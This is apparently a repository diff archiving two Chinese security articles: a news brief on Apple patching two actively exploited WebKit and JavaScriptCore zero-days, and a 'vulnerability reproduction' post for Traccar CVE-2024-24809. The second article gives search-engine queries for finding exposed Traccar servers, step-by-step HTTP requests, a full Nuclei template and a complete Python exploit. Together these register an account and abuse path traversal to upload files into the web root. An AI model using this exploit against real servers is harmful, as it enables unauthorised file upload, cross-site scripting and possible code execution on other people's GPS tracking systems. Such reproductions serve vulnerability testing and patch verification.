【漏洞复现】CVE-2024-24809、【安全圈】苹果解决了两个被积极利用的零日漏洞、

data.json

@@ -497,5 +497,7 @@
     "https://mp.weixin.qq.com/s?__biz=MzUyMTE0MDQ0OA==&mid=2247493842&idx=1&sn=56b5e7020601e1445bf2b6b280657435": "发现Web API漏洞居然能赚到400w刀，看懂这本书你也可以！",
     "https://mp.weixin.qq.com/s?__biz=Mzg2Nzk0NjA4Mg==&mid=2247495953&idx=1&sn=ea2dfd3fc4c7933ad3e1aa98c2c541e9": "Goby2024红队版工具分享，附2024年漏洞POC下载",
     "https://mp.weixin.qq.com/s?__biz=MzAxOTk3NTg5OQ==&mid=2247491674&idx=1&sn=62545629199e7669f3555330c6303e65": "威胁情报的尴尬：是个好能力，但不是个好生意！",
-    "https://mp.weixin.qq.com/s?__biz=MzkyOTQzNjIwNw==&mid=2247490042&idx=1&sn=04e5e7e89b24ef9eb1888ccf83229af0": "2024年wordpress、d-link等相关的多个cve漏洞poc"
+    "https://mp.weixin.qq.com/s?__biz=MzkyOTQzNjIwNw==&mid=2247490042&idx=1&sn=04e5e7e89b24ef9eb1888ccf83229af0": "2024年wordpress、d-link等相关的多个cve漏洞poc",
+    "https://mp.weixin.qq.com/s?__biz=MzUxMTk4OTA1NQ==&mid=2247484717&idx=1&sn=e1d048f5109ecfba86cb97c5063b24dc": "【漏洞复现】CVE-2024-24809",
+    "https://mp.weixin.qq.com/s?__biz=MzIzMzE4NDU1OQ==&mid=2652066203&idx=3&sn=98b7c0046c725ff8299a89a706c8ee43": "【安全圈】苹果解决了两个被积极利用的零日漏洞"
 }

doc/【安全圈】苹果解决了两个被积极利用的零日漏洞.md

@@ -0,0 +1,102 @@
+#  【安全圈】苹果解决了两个被积极利用的零日漏洞   
+ 安全圈   2024-11-24 11:00  
+  
+![](https://mmbiz.qpic.cn/sz_mmbiz_png/aBHpjnrGylgOvEXHviaXu1fO2nLov9bZ055v7s8F6w1DD1I0bx2h3zaOx0Mibd5CngBwwj2nTeEbupw7xpBsx27Q/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "")  
+  
+  
+**关键词**  
+  
+  
+  
+零日漏洞  
+  
+  
+![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/aBHpjnrGylgicwSoN6OFceKicK0nlUjNuN7ibSf4RFyQsB7eoCaLE8JA03xmW6lKfWOCln4CBnowBXHPYROQOU0FA/640?wx_fmt=jpeg&from=appmsg "")  
+  
+苹果发布了 iOS、iPadOS、macOS、visionOS 和 Safari 浏览器的安全更新，以解决两个被主动利用的零日漏洞。  
+  
+苹果针对 iOS、iPadOS、macOS、visionOS 和 Safari 浏览器中的两个零日漏洞发布了安全更新，这两个漏洞被追踪为 CVE-2024-44309 和 CVE-2024-44308，它们在野外被积极利用。  
+  
+CVE-2024-44309 漏洞是 WebKit 中的一个 cookie 管理问题，在处理恶意网页内容时可能导致跨站脚本 (XSS) 攻击。  
+  
+“处理恶意制作的网页内容可能会导致跨站脚本攻击。”苹果公司注意到有报告称，“这一问题可能已在基于英特尔的 Mac 系统上被积极利用。”  
+  
+苹果通过改进状态管理解决了 cookie 管理问题。  
+  
+CVE-2024-44308 漏洞影响 JavaScriptCore，在处理恶意网页内容时可能导致任意代码执行。  
+  
+“处理恶意制作的网页内容可能导致任意代码执行。”苹果公司注意到有报告称，“这一问题可能已在基于英特尔的 Mac 系统上被积极利用。”  
+  
+该公司通过改进检查功能修复了这一问题。  
+  
+这家 IT 巨头没有披露攻击的细节，也没有将其归咎于特定的威胁行为者。  
+  
+谷歌威胁分析小组的 Clément Lecigne 和 Benoît Sevens 发现了这两个漏洞。  
+  
+谷歌威胁分析小组（TAG）的工作重点是通过监控和打击高级持续性威胁（APT）和网络间谍活动（通常涉及商业间谍软件）来保护用户。这表明，这两个漏洞可能是高级威胁行为者所利用的漏洞的一部分。  
+  
+该公司发布了以下更新来解决这两个漏洞：  
+- iOS 18.1.1 和 iPadOS 18.1.1 – iPhone XS 及更高版本、iPad Pro 13 英寸、iPad Pro 12.9 英寸第三代及更高版本、iPad Pro 11 英寸第一代及更高版本、iPad Air 第三代及更高版本、iPad 第七代及更高版本，以及 iPad mini 第五代及更高版本。  
+  
+- iOS 17.7.2 和 iPadOS 17.7.2 – iPhone XS 及更新机型、iPad Pro 13 英寸、iPad Pro 12.9 英寸第二代及更新机型、iPad Pro 10.5 英寸、iPad Pro 11 英寸第一代及更新机型、iPad Air 第三代及更新机型、iPad 第六代及更新机型，以及 iPad mini 第五代及更新机型。  
+  
+- Safari 18.1.1 – 适用于运行 macOS Ventura 和 macOS Sonoma 的系统  
+  
+- macOS Sequoia 15.1.1  
+  
+- visionOS 2.1.1  
+  
+用户应及时将设备更新至最新版本。  
+  
+  
+  
+   END    
+  
+  
+阅读推荐  
+  
+  
+[【安全圈】2024年10月涉国内数据泄露事件汇总](http://mp.weixin.qq.com/s?__biz=MzIzMzE4NDU1OQ==&mid=2652066187&idx=1&sn=9cc9b36e4ddc3b1dc9c32f5d2235fec4&chksm=f36e7dcbc419f4dd7011a0a372ec2fb83585e6ae8913861e0b1ce62bcbf984c05d4992a32cb5&scene=21#wechat_redirect)  
+  
+  
+  
+[【安全圈】被曝“发涉黄短信给准爸爸”，两家母婴APP公司回应](http://mp.weixin.qq.com/s?__biz=MzIzMzE4NDU1OQ==&mid=2652066187&idx=2&sn=942b5fec79538a5d2fb8230633811d4a&chksm=f36e7dcbc419f4dd0e0ed1a36ee32cf749e3b64764ce18009ae0dfb577de8dfea3a7a0aa4500&scene=21#wechat_redirect)  
+  
+  
+  
+[【安全圈】福特否认遭黑客入侵：车主信息安全](http://mp.weixin.qq.com/s?__biz=MzIzMzE4NDU1OQ==&mid=2652066187&idx=3&sn=8313356546d83f1f3742bdc6675ac74c&chksm=f36e7dcbc419f4ddfd2a3baaae626b473388bf992926652b55854deeec81c156fd8cb954f488&scene=21#wechat_redirect)  
+  
+  
+  
+[【安全圈】D-Link忽视旧款VPN路由器补丁更新，关键漏洞未修复](http://mp.weixin.qq.com/s?__biz=MzIzMzE4NDU1OQ==&mid=2652066187&idx=4&sn=c4be9926d771d2293619bbe2dcc12b29&chksm=f36e7dcbc419f4ddb491db67e4fc6ec1515f6d7f688561be3515419ed7095a39ba6fc3b91bf9&scene=21#wechat_redirect)  
+  
+  
+  
+  
+![](https://mmbiz.qpic.cn/mmbiz_gif/aBHpjnrGylgeVsVlL5y1RPJfUdozNyCEft6M27yliapIdNjlcdMaZ4UR4XxnQprGlCg8NH2Hz5Oib5aPIOiaqUicDQ/640?wx_fmt=gif "")  
+  
+  
+  
+![](https://mmbiz.qpic.cn/mmbiz_png/aBHpjnrGylgeVsVlL5y1RPJfUdozNyCEDQIyPYpjfp0XDaaKjeaU6YdFae1iagIvFmFb4djeiahnUy2jBnxkMbaw/640?wx_fmt=png "")  
+  
+**安全圈**  
+  
+![](https://mmbiz.qpic.cn/mmbiz_gif/aBHpjnrGylgeVsVlL5y1RPJfUdozNyCEft6M27yliapIdNjlcdMaZ4UR4XxnQprGlCg8NH2Hz5Oib5aPIOiaqUicDQ/640?wx_fmt=gif "")  
+  
+  
+←扫码关注我们  
+  
+**网罗圈内热点 专注网络安全**  
+  
+**实时资讯一手掌握！**  
+  
+  
+![](https://mmbiz.qpic.cn/mmbiz_gif/aBHpjnrGylgeVsVlL5y1RPJfUdozNyCE3vpzhuku5s1qibibQjHnY68iciaIGB4zYw1Zbl05GQ3H4hadeLdBpQ9wEA/640?wx_fmt=gif "")  
+  
+**好看你就分享 有用就点个赞**  
+  
+**支持「****安全圈」就点个三连吧！**  
+  
+![](https://mmbiz.qpic.cn/mmbiz_gif/aBHpjnrGylgeVsVlL5y1RPJfUdozNyCE3vpzhuku5s1qibibQjHnY68iciaIGB4zYw1Zbl05GQ3H4hadeLdBpQ9wEA/640?wx_fmt=gif "")  
+  
+  

doc/【漏洞复现】CVE-2024-24809.md

@@ -0,0 +1,492 @@
+#  【漏洞复现】CVE-2024-24809   
+混子Hacker  混子Hacker   2024-11-24 16:25  
+  
+****  
+**免责声明**  
+  
+请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不承担任何法律及连带责任。  
+  
+  
+[   
+漏洞简介   
+]  
+  
+——    
+生活不可能像你想象的那么好，但也不会像你想象的那么糟。人的脆弱和坚强都超乎自己的想象。  
+ ——  
+  
+CVE-2024-24809  
+  
+Description Traccar 是一个开源的 GPS 跟踪系统。6.0 之前的版本容易受到路径遍历和不受限制地上传危险类型的文件的影响。由于系统默认允许注册，攻击者可以通过注册账号来获取普通用户权限，并利用该漏洞上传前缀为 device 的文件。在任何文件夹下。攻击者可以利用此漏洞进行网络钓鱼、跨站点脚本攻击，并可能在服务器上执行任意命令。版本 6.0 包含针对该问题的补丁  
+  
+  
+  
+  
+![](https://mmbiz.qpic.cn/mmbiz_png/a5FBLichkAGv9LicVJicUAAdGc6ibLKGZvJzZDhD5PI8HNcjTnOibA2yYrUxvhNhYjKFIbwOtjn37QX78llVrbj8Mew/640?wx_fmt=png&from=appmsg "")  
+  
+  
+  
+漏洞信息  
+  
+  
+  
+**混子Hacker**  
+  
+**01**  
+  
+资产测绘  
+  
+  
+```
+fofa: app="Traccar"
+Quake：title:"Traccar"
+```  
+  
+![](https://mmbiz.qpic.cn/mmbiz_png/a5FBLichkAGv9LicVJicUAAdGc6ibLKGZvJzVIKRGeTmjQArgicQFa0RpcFLD48tzjwXfbLIJ7fvNZytaQYPnGz7gPw/640?wx_fmt=png&from=appmsg "")  
+  
+![](https://mmbiz.qpic.cn/mmbiz_png/a5FBLichkAGv9LicVJicUAAdGc6ibLKGZvJzEfYPOERBDe4YAJNUu5PMuMTa136DokNFF77PgzCZTYAv3Zcib6xOC9g/640?wx_fmt=png&from=appmsg "")  
+  
+  
+  
+  
+  
+**混子Hacker**********  
+  
+**02**  
+  
+漏洞复现  
+  
+  
+1、注册账号  
+```
+POST /api/users HTTP/1.1
+Host: xxx
+Content-Type: application/json
+Accept-Encoding: gzip, deflate
+Accept: */*
+Content-Length: 73
+
+{"name": "用户名", "email": "邮箱", "password": "123456"}
+```  
+  
+![](https://mmbiz.qpic.cn/mmbiz_png/a5FBLichkAGv9LicVJicUAAdGc6ibLKGZvJzOeDkahRD5r8uWZo9l4mKhfhnnaCleSxVFan3a0h8ojia26QPciankycQ/640?wx_fmt=png&from=appmsg "")  
+  
+2、登录获取cookie  
+```
+POST /api/session HTTP/1.1
+Host: xxx
+Content-Type: application/x-www-form-urlencoded;charset=UTF-8
+Cookie: JSESSIONID=node04gx7rfnhjqgzm9ljql5tg9vn83.node0
+Accept-Encoding: gzip, deflate
+Accept: */*
+Content-Length: 40
+
+email=邮箱&password=123456
+```  
+  
+  
+![](https://mmbiz.qpic.cn/mmbiz_png/a5FBLichkAGv9LicVJicUAAdGc6ibLKGZvJzsDObL8lcNtBA56GCVLh5QG5HjYkib7NYl0XRb3Tmq8yyFRz1ES1svRg/640?wx_fmt=png&from=appmsg "")  
+  
+3、添加device，获取device_id即响应包中的id值  
+```
+POST /api/devices HTTP/1.1
+Host: xxx
+Accept-Encoding: gzip, deflate
+Accept: */*
+Content-Type: application/json
+Cookie: JSESSIONID=node04gx7rfnhjqgzm9ljql5tg9vn83.node0
+Content-Length: 44
+
+{"name": "oiCEsOJk", "uniqueId": "oiCEsOJk"}
+```  
+  
+![](https://mmbiz.qpic.cn/mmbiz_png/a5FBLichkAGv9LicVJicUAAdGc6ibLKGZvJzbUVfkNQCLdfib8ib8CDawhl9IwxZhDnrDU3z2sDMAXd1NZbyUQIzRP3A/640?wx_fmt=png&from=appmsg "")  
+  
+4、上传文件，Content-Type设置为image/文件后缀  
+```
+POST /api/devices/{device_id}/image HTTP/1.1
+Host: xxx
+Accept-Encoding: gzip, deflate
+Accept: */*
+Content-Type: image/HUyjxWsW
+Cookie: JSESSIONID=node04gx7rfnhjqgzm9ljql5tg9vn83.node0
+Content-Length: 20
+
+hPrctfuSZzpXdTTGcqvO
+```  
+  
+![](https://mmbiz.qpic.cn/mmbiz_png/a5FBLichkAGv9LicVJicUAAdGc6ibLKGZvJzicpev9hESWt89kcibXl4ulBwTTGy2dSc539BnmQst8b2icCNV7uFs5tYw/640?wx_fmt=png&from=appmsg "")  
+  
+  
+5、更改上传路径  
+device_name  
+为步骤3中的name  
+```
+PUT /api/devices/{device_id} HTTP/1.1
+Host: xxx
+Accept-Encoding: gzip, deflate
+Accept: */*
+Content-Type: application/json
+Cookie: JSESSIONID=node04gx7rfnhjqgzm9ljql5tg9vn83.node0
+Content-Length: 326
+
+{"id": {device_id}, "attributes": {"deviceImage": "device.png"}, "groupId": 0, "calendarId": 0, "name": "test", "uniqueId": "{device_name}/../../../../../opt/traccar/modern", "status": "offline", "lastUpdate": null, "positionId": 0, "phone": null, "model": null, "contact": null, "category": null, "disabled": false, "expirationTime": null}
+```  
+  
+![](https://mmbiz.qpic.cn/mmbiz_png/a5FBLichkAGv9LicVJicUAAdGc6ibLKGZvJzlGDjRNGdgDbuFQnxqNLZkXJDoUF8GFubQibcgmztnpLBMfWnlF9btzA/640?wx_fmt=png&from=appmsg "")  
+  
+  
+6、再次上传文件  
+```
+POST /api/devices/{device_id}/image HTTP/1.1
+Host: xxx
+Accept-Encoding: gzip, deflate
+Accept: */*
+Content-Type: image/HUyjxWsW
+Cookie: JSESSIONID=node04gx7rfnhjqgzm9ljql5tg9vn83.node0
+Content-Length: 20
+
+hPrctfuSZzpXdTTGcqvO
+```  
+  
+![](https://mmbiz.qpic.cn/mmbiz_png/a5FBLichkAGv9LicVJicUAAdGc6ibLKGZvJzDU33iabaSbFiaPzw4GibuiaLbSNjPxuyPNlpyZ1COAMmIyyAlZFYNNYN6g/640?wx_fmt=png&from=appmsg "")  
+  
+访问上传成功  
+  
+![](https://mmbiz.qpic.cn/mmbiz_png/a5FBLichkAGv9LicVJicUAAdGc6ibLKGZvJzvibPfqJy4FbzvfxBaf121ASfRwWjo0IsfX1hVkIRdbicBaC5SKCtJ0CQ/640?wx_fmt=png&from=appmsg "")  
+  
+可以上传一个xss payload也是成功弹窗  
+  
+![](https://mmbiz.qpic.cn/mmbiz_png/a5FBLichkAGv9LicVJicUAAdGc6ibLKGZvJzibeBDcVqo6890AfCUYPVJJbzKgJZZEL59kgzvg2W7Qz8fHeP9nQbvQw/640?wx_fmt=png&from=appmsg "")  
+  
+![](https://mmbiz.qpic.cn/mmbiz_png/a5FBLichkAGv9LicVJicUAAdGc6ibLKGZvJz7oPgibBhfVpyznicw4KS0G3icDBCfaryBPZTt1r9lN5FTVwQZIeZprmsQ/640?wx_fmt=png&from=appmsg "")  
+  
+  
+  
+  
+  
+**混子Hacker**********  
+  
+**03**  
+  
+Nuclei Poc  
+  
+  
+```
+id: CVE-2024-24809
+
+info:
+  name: Traccar - An authentication bypass vulnerability
+  author: Ghost_sec
+  severity: high
+  description:
+    Traccar is an open source GPS tracking system. Versions prior to 6.0 are vulnerable to path traversal and unrestricted upload of file with dangerous type. Since the system allows registration by default, attackers can acquire ordinary user permissions by registering an account and exploit this vulnerability to upload files with the prefix `device.` under any folder. Attackers can use this vulnerability for phishing, cross-site scripting attacks, and potentially execute arbitrary commands on the server. Version 6.0 contains a patch for the issue.
+  reference:
+    - https://github.com/traccar/traccar/commit/b099b298f90074c825ba68ce73532933c7b9d901
+    - https://notcve.org/view.php?id=CVE-2024-24809
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-24809
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:L
+    cvss-score: 8.5
+    cve-id: CVE-2024-24809
+    cwe-id: CWE-27
+    epss-score: 0.00043
+    epss-percentile: 0.09551
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: app:"Traccar"
+  tags: cve,cve2024,traccar,rce,intrusive,file-upload
+
+variables:
+  name: "ghostsec"
+  password: "ghostsec"
+  email: "ghostsec@ghostsec.com"
+  unique: "{{rand_base(6)}}"
+  str: "{{randstr}}"
+
+flow: http(1) && http(2) && http(3) && http(4) && http(5) && http(6) && http(7)
+
+http:
+  - raw:
+      - |
+        POST /api/users HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"name": "{{name}}", "email": "{{email}}", "password": "{{password}}", "totpKey": null}
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"administrator":'
+          - '"fixedEmail"'
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        POST /api/session HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded;charset=UTF-8
+
+        email={{email}}&password={{password}}
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"deviceReadonly":'
+          - '"expirationTime":'
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        POST /api/devices HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"name": "{{unique}}", "uniqueId": "{{unique}}"}
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"calendarId"'
+          - '"groupId":'
+        condition: and
+        internal: true
+
+    extractors:
+      - type: json
+        part: body
+        name: value
+        internal: true
+        json:
+          - '.id'
+
+  - raw:
+      - |
+        POST /api/devices/{{value}}/image HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: image/srHtgGrc
+
+        {{str}}
+
+    extractors:
+      - type: regex
+        part: body
+        name: filename
+        internal: true
+        regex:
+          - 'device\.([a-zA-Z]+)'
+
+    matchers:
+      - type: dsl
+        dsl:
+          - status_code == 200
+          - contains(content_type, "application/json")
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        PUT /api/devices/{{value}} HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"id": {{value}}, "attributes": {"deviceImage": "device.png"}, "groupId": 0, "calendarId": 0, "name": "test", "uniqueId": "{{unique}}/../../../../../opt/traccar/modern", "status": "offline", "lastUpdate": null, "positionId": 0, "phone": null, "model": null, "contact": null, "category": null, "disabled": false, "expirationTime": null}
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"deviceImage":'
+          - '"expirationTime":'
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        POST /api/devices/{{value}}/image HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: image/srHtgGrc
+
+        {{str}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - status_code == 200
+          - contains(content_type, "application/json")
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        GET /{{filename}} HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - status_code == 200
+```  
+  
+python脚本  
+```
+import requests
+import random
+import string
+import sys
+
+session = requests.session()
+
+def generate_random_string(length=8):
+    letters = string.ascii_letters
+    result_str = ''.join(random.choice(letters) for i in range(length))
+    return result_str
+
+
+def register(target, username):
+    headers = {
+        'Content-Type': "application/json"
+    }
+    data = {
+        "name": username,
+        "email": f"{username}@admin.com",
+        "password": "123456"
+    }
+    
+    res = session.post(f"{target}/api/users",headers=headers, json=data)
+    return res
+
+
+def login(target, username):
+    headers = {
+        'Content-Type': "application/x-www-form-urlencoded;charset=UTF-8"
+    }
+    data = 'email=' + username + '@admin.com&password=123456'
+    res = session.post(f"{target}/api/session",headers=headers, data=data)
+    return res
+
+
+def add_device(target, device_name):
+    headers = {
+        'Content-Type': "application/json"
+    }
+    data = {
+        "name": device_name,
+        "uniqueId": device_name
+    }
+    res = session.post(f"{target}/api/devices",headers=headers, json=data)
+    return res
+
+
+def upload_file(target, device_id, file_suffix, data):
+    headers = {
+        'Content-Type': f"image/{file_suffix}"
+    }
+    res = session.post(f"{target}/api/devices/{device_id}/image",headers=headers, data=data)
+    return res
+
+def change_upload_path(target, device_id, device_name, upload_path):
+    headers = {
+        'Content-Type': 'application/json'
+    }
+    data = {
+        "id": device_id,
+        "attributes": {
+            "deviceImage": "device.png"
+        },
+        "groupId": 0,
+        "calendarId": 0,
+        "name": "test",
+        "uniqueId": f"{device_name}/../../../../..{upload_path}",
+        "status": "offline", "lastUpdate":None,"positionId":0,"phone":None,"model":None,"contact":None,"category":None,"disabled":False,"expirationTime":None}
+    res = session.put(f"{target}/api/devices/{device_id}",headers=headers, json=data)
+    return res
+
+
+if __name__ == "__main__":
+    if len(sys.argv) != 2:
+        print(f"Usage: python {sys.argv[0]} http://example.com:8082")
+        sys.exit(0)
+    target = sys.argv[1]
+    username = generate_random_string()
+    # register user
+    res = register(target, username)
+    if username not in res.text:
+        print("Register Error!!")
+        sys.exit(0)
+    print(f"Register: {username}@admin.com  Password: 123456")
+    # login
+    res = login(target, username)
+    if username not in res.text:
+        print("Login Error!!")
+        sys.exit(0)
+    print("Login Success!!")
+    device_name = generate_random_string()
+
+    # Add Device
+    res = add_device(target, device_name)
+    if 'id' not in res.text:
+        print("ADD Device Error!!")
+        sys.exit(0)
+    print(f'Add Device Success!! [{device_name}]')
+    device_id = res.json()['id']
+
+    # # Upload File
+    suffix = generate_random_string()
+    data = generate_random_string(20)
+    res = upload_file(target, device_id, suffix, data)
+    if 'device.' + suffix not in res.text:
+        print("Upload Error!!")
+        sys.exit(0)
+    print(f"First Upload Success!!")
+
+    # Change Upload Path
+    upload_path = "/opt/traccar/modern"
+    res = change_upload_path(target, device_id, device_name, upload_path)
+    if upload_path not in res.text:
+        print("Change Upload Path Error!!")
+        sys.exit(0)
+    print("Change Upload Path Success!!")
+
+    # Upload File Again
+    res = upload_file(target, device_id, suffix, data)
+    if 'device.' + suffix not in res.text:
+        print("Upload Error!!")
+        sys.exit(0)
+    
+    print("Upload Success!!")
+    # Check upload
+    # if set upload_path = "/opt/traccar/modern"
+    check_url = f"{target}/device.{suffix}"
+    print(f"Check: {check_url}")
+    res = session.get(check_url)
+    if data in res.text:
+        print("Is a Vulnerability!")
+    else:
+        print('Not is a Vulnerability!')
+```  
+  
+  
+  
+  
+<<<    
+END   
+>>>  
+  
+  
+  
+原创文章｜转载请附上原文出处链接  
+  
+更多漏洞｜关注作者查看  
+  
+作者｜混子Hacker  
+  
+  
+